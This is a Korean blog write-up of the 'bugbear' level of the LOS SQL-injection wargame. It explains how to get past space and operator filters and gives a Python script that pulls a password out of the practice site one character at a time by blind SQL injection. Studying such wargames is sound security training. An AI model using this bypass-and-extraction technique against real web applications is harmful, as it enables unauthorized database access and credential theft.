버그베어?
뭐하는 친구인지 알아보자
필터링이 또 많아졌다...
하지만 걱정할 필요는 없는것 같다.
그동안 풀었던 문제들의 짬뽕이랄까?
12번 문제에서 풀었던 답은 이미 이번 문제에서 필터링하는 대부분의 문자를 건너뛴 상태이다
공백과 연산자만 우회하면 되는데
응? 코드를 잘보니 굳이 공백을 넣어주지 않아도 되는 해답이다!!
공백을 지우고 연산자는 기호를 통해 표현한 코드는 아래와 같다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | import requests URL = 'http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php' head={ 'cookie' : 'PHPSESSID=r3qj7; __cfduid=d4373' } for j in range(1,9): for i in range(32,127): params = {"no" : "1||no>1&&mid(pw,"+str(j)+",1)>char("+str(i)+")"} res = requests.get(url=URL, params=params, headers=head) if "Hello admin" not in res.text: print(chr(i)) break; | cs |
실행하면?
아주잘된다 ㅎㅎ
사실 운이 좋아서 이렇게 풀었지만 공백 필터를 우회하는 방법은 많다.
블로그 검색칸에 '공백필터링'을 검색하면 나온다.
'Wargame > LOS(eagle-jump)' 카테고리의 다른 글
| [LOS]15번 assassin (0) | 2017.08.03 |
|---|---|
| [LOS]14번 giant (0) | 2017.08.03 |
| [LOS]12번 darkknight (0) | 2017.08.02 |
| [LOS]11번 golem (0) | 2017.08.01 |
| [LOS]10번 skeleton (0) | 2017.08.01 |
